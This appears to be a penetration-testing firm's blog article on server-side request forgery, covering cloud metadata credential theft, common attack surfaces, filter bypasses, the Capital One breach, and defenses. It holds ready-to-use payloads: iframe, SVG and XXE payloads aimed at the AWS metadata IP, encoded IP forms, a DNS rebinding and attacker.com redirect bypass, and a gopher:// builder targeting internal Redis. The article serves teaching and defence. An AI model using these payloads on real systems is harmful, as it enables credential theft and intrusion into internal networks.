Server-Side Request Forgery is deceptively simple. You find a feature where the application makes an HTTP request on your behalf, and you convince it to request something it should not. That "something" could be an internal service, a cloud metadata endpoint, or a database admin panel that is firewalled off from the internet but fully accessible from the application server.

SSRF earned its spot on the OWASP Top 10 in 2021 not because of how often it appears, but because of what happens when it does.[1] A single SSRF vulnerability was the initial access vector in the 2019 Capital One breach, which exposed the personal data of over 100 million customers.[2] The attacker used SSRF to reach the AWS Instance Metadata Service (IMDS), obtained temporary IAM credentials, and used those credentials to access S3 buckets containing customer data. The entire attack chain started with one URL parameter that the application fetched without restriction.

This article covers how SSRF works, where we find it, how we exploit it during penetration tests, and what you need to do to prevent it. We will cover classic SSRF, blind SSRF, SSRF through unexpected vectors like PDF generators and webhook systems, and the cloud-specific risks that make SSRF particularly dangerous in modern infrastructure.


How SSRF Works: The Fundamentals

At its core, SSRF is a trust boundary violation. Web applications regularly need to make outbound HTTP requests: fetching a URL to generate a preview, downloading an image for processing, calling a webhook, or communicating with internal microservices. The vulnerability occurs when user-controlled input influences the target of one of these requests.

Consider a feature that generates a thumbnail preview of a URL. The user submits https://example.com, and the server fetches it, renders it, and returns a screenshot. Now the user submits http://169.254.169.254/latest/meta-data/. The server fetches that too, because to the server, it is just another URL. But that URL points to the AWS Instance Metadata Service, which is only accessible from within the EC2 instance itself, and it returns IAM role credentials, instance identity documents, and other sensitive data.

The critical insight is that the server has a different network position than the user. It can reach internal services, cloud metadata endpoints, and private network ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) that are completely inaccessible from the public internet. SSRF turns the application into an unwitting proxy into the internal network.

Cloud Metadata: The High-Value Target

In cloud environments, SSRF is not just a way to scan internal networks. It is a direct path to credential theft. Every major cloud provider runs a metadata service on a link-local address that is accessible from any instance running in their environment.

AWS Instance Metadata Service (IMDS)

The AWS IMDS at http://169.254.169.254 exposes a tree of instance information. The most dangerous endpoint is /latest/meta-data/iam/security-credentials/[role-name], which returns temporary AWS credentials (access key, secret key, and session token) for the IAM role attached to the instance.[3] With those credentials, an attacker can access any AWS service the role permits: S3 buckets, DynamoDB tables, SQS queues, Lambda functions, and more.

This is exactly what happened in the Capital One breach. The attacker exploited an SSRF in a WAF (Web Application Firewall) reverse proxy to reach the IMDS, retrieved IAM credentials for a role that had excessive S3 permissions, and exfiltrated over 700 S3 buckets worth of customer data.[2]

AWS introduced IMDSv2 in November 2019 as a response. IMDSv2 requires a PUT request to obtain a session token before accessing metadata, which mitigates basic SSRF because most SSRF vectors only allow GET requests.[4] However, IMDSv2 is not enforced by default. Instances must be explicitly configured to require it, and in our experience, a significant number of EC2 instances still allow IMDSv1.
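The IMDSv2 token handshake can be sketched in a few lines. This is a hedged illustration using only Python's standard library: nothing is sent, the code merely builds the two requests AWS documents, which makes it clear why a GET-only SSRF primitive cannot complete step one.

```python
import urllib.request

IMDS = "http://169.254.169.254"

def token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    # Step 1: a PUT request obtains a short-lived session token.
    # A typical SSRF primitive can only issue GETs, so it stops here.
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )

def metadata_request(path: str, token: str) -> urllib.request.Request:
    # Step 2: every metadata read must present the token as a header.
    return urllib.request.Request(
        f"{IMDS}{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )
```

On an instance that still allows IMDSv1, skipping step one and issuing a plain GET to the metadata path works, which is exactly what an SSRF primitive provides.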

GCP, Azure, and Other Cloud Providers

Google Cloud's metadata service runs at http://metadata.google.internal (also 169.254.169.254) and requires a Metadata-Flavor: Google header. This header requirement provides some protection against basic SSRF, but it can often be bypassed in scenarios where the attacker controls request headers (such as SSRF through an HTTP client library that allows custom headers).[5]

Azure's Instance Metadata Service at http://169.254.169.254/metadata/instance requires a Metadata: true header. Azure also provides an endpoint at http://169.254.169.254/metadata/identity/oauth2/token that returns managed identity access tokens, functionally equivalent to AWS IAM role credentials.

DigitalOcean, Alibaba Cloud, Oracle Cloud, and other providers all run similar metadata services at the same or similar addresses. If the target runs in any cloud environment and has an SSRF vulnerability, credential theft is the first thing we test for.

The 169.254.169.254 checklist: When we find SSRF, our first request is always to the cloud metadata endpoint. If the target is on AWS and IMDSv1 is enabled, we can typically go from "found SSRF" to "have AWS credentials" in under 60 seconds.

Where We Find SSRF: Common Attack Surfaces

SSRF does not only appear in obvious "fetch this URL" features. Some of the most impactful SSRF vulnerabilities we have found were in functionality that nobody considered an SSRF risk.

URL Preview and Link Unfurling

This is the textbook SSRF vector. Applications that generate rich previews of URLs (like chat applications, project management tools, and social media platforms) need to fetch the URL to extract its title, description, and thumbnail. If the fetch logic does not restrict which URLs can be requested, it is SSRF.

We test this by submitting URLs pointing to our own infrastructure (using Burp Collaborator or a custom listener) and then pivoting to internal addresses. Even if the application does not display the response, the fact that it makes the request is enough for us to confirm the vulnerability and begin probing internal services.

PDF Generation and HTML-to-PDF Conversion

Server-side PDF generation is one of the most overlooked SSRF vectors. Applications using wkhtmltopdf, Puppeteer, WeasyPrint, or similar tools to convert HTML to PDF are particularly vulnerable because these tools render HTML, which means they process external resource references.[6]

If the application allows user-supplied HTML (for invoices, reports, or document templates), we inject references to internal resources, for example:

<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/"></iframe>
<img src="http://10.0.0.5:8080/admin">

In one engagement, we found that a SaaS application's invoice generation feature used wkhtmltopdf and allowed custom HTML in the invoice footer field. We injected an iframe pointing to the AWS metadata service, and the resulting PDF contained the full IAM credentials for the application's service role. The role had read access to the production RDS database.

Webhook Functionality

Any application that allows users to configure a webhook URL is potentially vulnerable to SSRF. The application makes HTTP requests to the webhook URL when events occur, and if the URL is not validated against an allowlist, the attacker can point it at internal services.

Webhook SSRF is particularly useful for blind SSRF attacks (which we cover below) because the requests happen asynchronously. We configure the webhook URL to point at various internal addresses and use timing or out-of-band techniques to determine which services responded.

Image and File Processing

Features that download and process images from URLs, such as profile photo imports, image resizing services, or file format converters, are common SSRF vectors. The application fetches the URL to retrieve the image, and that fetch can be redirected to internal services.

A more sophisticated variant involves SVG files. SVG is an XML-based format that supports external entity references and embedded foreign objects. Uploading an SVG file with an external reference to an internal URL can trigger SSRF during server-side rendering:

<svg xmlns="http://www.w3.org/2000/svg"><image href="http://169.254.169.254/latest/meta-data/iam/security-credentials/" /></svg>

XML Parsing (XXE as SSRF)

XML External Entity (XXE) injection is technically its own vulnerability class, but it frequently serves as an SSRF vector. If the application parses XML input with external entity processing enabled, an attacker can define an entity that references an internal URL, and the XML parser will fetch it.[7]

This appears in SOAP APIs, XML file uploads (DOCX, XLSX, and SVG files are all XML-based), and any endpoint that accepts XML input. The classic XXE payload for SSRF is:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>

Blind SSRF: When You Cannot See the Response

In many SSRF scenarios, the application does not return the server's response to the attacker. The application might fetch the URL internally but only display a "Success" or "Failed" message. This is blind SSRF, and it is still exploitable.

Out-of-Band Detection

The first step is confirming the vulnerability exists. We use Burp Collaborator or a custom DNS and HTTP listener to detect when the server makes an outbound request.[8] If we submit http://[unique-id].oastify.com as the URL and receive a DNS lookup or HTTP request at our listener, we have confirmed SSRF even though we never see the response content.

Internal Port Scanning

Even without seeing response content, we can determine which internal services are running by measuring response times and status codes. A request to http://10.0.0.5:22 (SSH) might time out differently than a request to http://10.0.0.5:80 (HTTP) or http://10.0.0.5:9999 (nothing listening). By scanning common ports across internal IP ranges, we build a map of the internal network through the SSRF vulnerability.
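A minimal sketch of that timing-based inference follows. The helper names and the cutoff values are ours, chosen for illustration; on a real engagement we calibrate the thresholds against known-open and known-closed ports on the target first.

```python
def probe_urls(host: str, ports: list[int]) -> list[str]:
    """URLs we would feed into the SSRF parameter, one per candidate port."""
    return [f"http://{host}:{port}/" for port in ports]

def classify(elapsed_seconds: float, timeout: float = 10.0) -> str:
    """Guess the port state from how long the server-side fetch took."""
    if elapsed_seconds >= timeout:
        return "filtered or non-HTTP"  # connection hung until the timeout
    if elapsed_seconds < 0.5:
        return "closed"                # immediate connection refused
    return "open"                      # something accepted and answered
```

Feeding `probe_urls("10.0.0.5", [22, 80, 443, 3306, 6379, 8080])` through the vulnerable parameter and classifying each response time builds the service map one port at a time.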

Exploiting Blind SSRF for Impact

Blind SSRF becomes high-impact when internal services perform actions based on receiving a request, regardless of who reads the response. Examples include admin endpoints that trigger actions on a bare GET (cache flushes, configuration reloads, service restarts), internal APIs that enqueue jobs or send notifications, and services like Redis or Memcached that can be driven through protocol smuggling, where a single crafted request is enough to write data or achieve code execution.

Bypassing SSRF Protections

Many applications implement some form of URL validation to prevent SSRF. In our experience, these protections are almost always bypassable. Here are the techniques we use.

IP Address Obfuscation

If the application blocks requests to 169.254.169.254, we try alternative representations of the same IP address: decimal (http://2852039166/), hexadecimal (http://0xa9fea9fe/), octal (http://0251.0376.0251.0376/), IPv6-mapped (http://[::ffff:169.254.169.254]/), and shortened dotted forms such as http://169.254.43518/. Which of these reach the target depends on the HTTP client library, so we try them all.
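These encodings are mechanical, so we generate them rather than type them by hand. A short sketch (the helper name is ours; whether a given form actually reaches the target depends on how the server's HTTP client parses host strings):

```python
import ipaddress

def alternate_forms(dotted: str) -> dict[str, str]:
    """Generate equivalent encodings of an IPv4 address that naive
    string-based blocklists often miss."""
    n = int(ipaddress.IPv4Address(dotted))
    octets = dotted.split(".")
    return {
        "decimal": str(n),                                   # http://2852039166/
        "hex": hex(n),                                       # http://0xa9fea9fe/
        "octal": ".".join(f"0{int(o):o}" for o in octets),   # http://0251.0376.0251.0376/
        "ipv6_mapped": f"[::ffff:{dotted}]",
    }
```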

DNS Rebinding

DNS rebinding attacks exploit the gap between when the application validates the URL and when it fetches it. Here is the process:

  1. We register a domain (say, rebind.attacker.com) and configure its DNS to alternate between resolving to a public IP (which passes validation) and an internal IP (which is the actual target).
  2. We submit http://rebind.attacker.com to the SSRF endpoint.
  3. The application resolves the domain, gets the public IP, and passes validation.
  4. The application then makes the actual HTTP request. If DNS has been re-resolved (or if the TTL was set to 0), it now resolves to the internal IP.

Tools like rbndr.us provide easy-to-use DNS rebinding services for testing.[9] We also use custom DNS servers that alternate responses between public and private addresses with zero TTL.
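The validate-then-fetch race can be sketched with a toy resolver that alternates answers on every lookup, standing in for a zero-TTL attacker-controlled DNS server. Everything here is illustrative, not a real resolver:

```python
from itertools import cycle

class RebindingResolver:
    """Toy stand-in for attacker DNS that alternates answers
    on every lookup (the effect of a zero TTL)."""
    def __init__(self, answers):
        self._answers = cycle(answers)

    def resolve(self, hostname: str) -> str:
        return next(self._answers)

resolver = RebindingResolver(["203.0.113.10", "169.254.169.254"])

def vulnerable_fetch(url_host: str) -> str:
    # Validation resolves once and sees the public IP...
    checked_ip = resolver.resolve(url_host)
    assert not checked_ip.startswith("169.254.")  # passes
    # ...the HTTP client resolves again and connects somewhere else.
    return resolver.resolve(url_host)
```

The fix is to resolve once, validate the result, and connect to that exact IP, never letting the HTTP client perform a second lookup.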

Redirect-Based Bypass

If the application validates the URL but follows redirects, we can host a redirect on an allowed domain that points to an internal address. The application validates https://attacker.com/redirect (external, allowed), fetches it, receives a 302 redirect to http://169.254.169.254/latest/meta-data/, and follows the redirect to the internal service.

We set up a simple redirect server for this purpose; a few lines of Python are enough. A related trick needs no redirect at all: a DNS record on a domain we control that simply resolves to 127.0.0.1 or another internal address.

URL Parser Inconsistencies

Different URL parsers handle edge cases differently. If the application validates the URL with one parser and fetches it with another, inconsistencies can be exploited. Classic examples include userinfo confusion (http://allowed.example@169.254.169.254/ passes a check that looks at the text before the @ but connects to the metadata IP), fragment tricks (http://169.254.169.254#allowed.example), and backslash handling, where one parser treats \ as a path separator and another as part of the host.
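A concrete instance of the userinfo trick, using Python's urlsplit as the "real" parser and a substring check standing in for a hypothetical broken validator:

```python
from urllib.parse import urlsplit

def naive_allowed(url: str) -> bool:
    # Hypothetical broken validator: substring match on the allowlisted host.
    return "allowed.example" in url

url = "http://allowed.example@10.0.0.1/admin"

# The validator passes, but per RFC 3986 everything before "@" in the
# authority is userinfo, so the HTTP client connects to 10.0.0.1.
assert naive_allowed(url)
assert urlsplit(url).hostname == "10.0.0.1"
```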

Real-World Impact: Lessons from Major Breaches

Capital One (2019)

The Capital One breach remains the most significant SSRF-driven incident in history. Paige Thompson exploited an SSRF vulnerability in a misconfigured WAF (a reverse proxy running on EC2) to access the AWS metadata service. The WAF had an IAM role with broad S3 access, and the SSRF allowed retrieval of the role's temporary credentials. The result was unauthorized access to 106 million customer records, including Social Security numbers and bank account numbers. Capital One was fined $80 million by the OCC and settled a class-action lawsuit for $190 million.[2]

GitLab (CVE-2021-22214)

GitLab had an SSRF vulnerability in its webhook functionality that allowed authenticated users to make arbitrary HTTP requests from the GitLab server.[10] Because GitLab instances often run in cloud environments with access to metadata services and internal infrastructure, this vulnerability could be leveraged for credential theft and internal network access. GitLab rated it as a critical severity issue.

Grafana (CVE-2020-13379)

Grafana's avatar feature had an SSRF vulnerability that allowed unauthenticated users to make the Grafana server send HTTP requests to arbitrary URLs. Combined with Grafana's typical deployment inside internal networks with access to monitoring infrastructure, this provided a pivot point into internal services. The vulnerability required no authentication, making it particularly dangerous.

The pattern: Every major SSRF breach follows the same formula. An internet-facing application with SSRF plus a cloud environment with overly permissive IAM roles plus IMDSv1 (or equivalent) equals credential theft and data exfiltration. Break any one of those links and the chain fails.

Defending Against SSRF

Effective SSRF prevention requires defense in depth. No single control is sufficient because, as we demonstrated above, individual protections can usually be bypassed. Here is what we recommend based on what we see working in practice.

Network-Level Controls

Run application workloads in segments with deny-by-default egress rules. Block outbound traffic to RFC 1918 ranges and the link-local 169.254.0.0/16 block (which includes the metadata IP) unless a service explicitly needs it, and route legitimate outbound requests through an egress proxy that enforces a destination allowlist and logs every request.

Application-Level Controls

Validate user-supplied URLs against an allowlist of schemes (http and https only) and, where possible, an allowlist of destination hosts. Resolve the hostname, reject private, loopback, and link-local addresses, and connect to the validated IP rather than re-resolving. Disable or tightly limit redirect following in the HTTP client, and never return raw server-side fetch responses to the user.

Infrastructure-Level Controls

Enforce IMDSv2 on all EC2 instances (set HttpTokens to required) or the equivalent metadata hardening on other providers, scope IAM roles and managed identities to least privilege so stolen credentials are worth less, and set the metadata response hop limit to 1 so containers cannot reach the host's metadata service.
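A hedged sketch of the application-level check, using only Python's standard library. The function names are ours, not from any framework, and a production version must also pin the actual connection to the validated IP, or the DNS rebinding window reopens:

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Address classes we refuse to fetch.
BLOCKED = ("is_private", "is_loopback", "is_link_local", "is_reserved", "is_multicast")

def is_public_address(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    return not any(getattr(ip, flag) for flag in BLOCKED)

def validate_url(url: str) -> str:
    """Return one validated IP for the URL, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    if parts.hostname is None:
        raise ValueError("no host")
    # Resolve once; every answer must be public.
    infos = socket.getaddrinfo(parts.hostname, None)
    ips = {info[4][0] for info in infos}
    if not all(is_public_address(ip) for ip in ips):
        raise ValueError("resolves to a non-public address")
    # The caller should connect to this IP directly and carry the
    # original hostname only in the Host header / SNI field.
    return ips.pop()
```

Note that 169.254.169.254 is caught by the is_link_local check, and the private-range checks cover 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 without hand-maintained blocklists.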


Our SSRF Testing Methodology

When we assess an application for SSRF, we follow a systematic approach that covers both obvious and non-obvious attack surfaces.

Phase 1: Attack Surface Identification

We map every feature where the application makes server-side HTTP requests. This includes obvious features (URL previews, file imports, webhook configurations) and less obvious ones (PDF generation, email sending with custom templates, OAuth integration, API integrations). We also review the application's JavaScript for API calls that include URL parameters.

Phase 2: Validation Testing

For each identified endpoint, we test what URLs are accepted. We start with our Burp Collaborator domain to confirm the application makes outbound requests, then systematically test internal addresses (127.0.0.1, 169.254.169.254, 10.0.0.0/8 ranges), alternative IP representations, and redirect-based bypasses.

Phase 3: Exploitation

When we confirm SSRF, we attempt to:

  1. Access cloud metadata endpoints and retrieve IAM/service account credentials.
  2. Scan internal network ranges to identify running services.
  3. Access internal admin interfaces, databases, and monitoring tools.
  4. Read local files via the file:// scheme (if supported by the HTTP client).
  5. Interact with internal services using protocol smuggling (gopher://, dict://).
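Protocol smuggling in step 5 works because a gopher URL is effectively "write these bytes to a TCP socket." A sketch of a payload builder (the helper is our own; whether the server-side client supports gopher:// at all, as libcurl builds often do, is the first thing to verify):

```python
from urllib.parse import quote

def gopher_payload(host: str, port: int, raw: bytes) -> str:
    """Build a gopher:// URL that makes a gopher-capable client write
    `raw` to an arbitrary TCP port. The leading "_" is the gopher
    item-type byte, which is consumed before the bytes hit the wire."""
    return f"gopher://{host}:{port}/_{quote(raw)}"

# Redis speaks a plain CRLF-terminated inline protocol, so a crafted
# gopher URL can issue commands to an internal instance.
payload = gopher_payload("10.0.0.5", 6379, b"PING\r\nQUIT\r\n")
```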

Phase 4: Impact Demonstration

For every confirmed SSRF, we document the maximum achievable impact. If we obtain cloud credentials, we enumerate what those credentials can access. If we reach internal services, we document what data or actions are available. This impact assessment is critical for communicating the severity to development and leadership teams.

Sources

  1. OWASP Top 10:2021 - A10 Server-Side Request Forgery - owasp.org
  2. United States Department of Justice - Former Seattle Tech Worker Convicted of Wire Fraud and Computer Intrusions (Capital One breach) - justice.gov
  3. AWS Documentation - Instance Metadata and User Data - docs.aws.amazon.com
  4. AWS Blog - Defense in Depth: Enforcing IMDSv2 - aws.amazon.com
  5. Google Cloud Documentation - Storing and Retrieving Instance Metadata - cloud.google.com
  6. HackTricks - Server Side Request Forgery via PDF Generators - book.hacktricks.xyz
  7. OWASP - XML External Entity (XXE) Processing - owasp.org
  8. PortSwigger - Burp Collaborator Documentation - portswigger.net
  9. DNS Rebinding Attacks Explained - unit42.paloaltonetworks.com
  10. CVE-2021-22214 - GitLab SSRF via Webhook - nvd.nist.gov

Could SSRF Expose Your Internal Network?

We test for SSRF across every attack surface, including the non-obvious ones. Find out if your web application can be used as a gateway to your cloud credentials and internal infrastructure.


Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.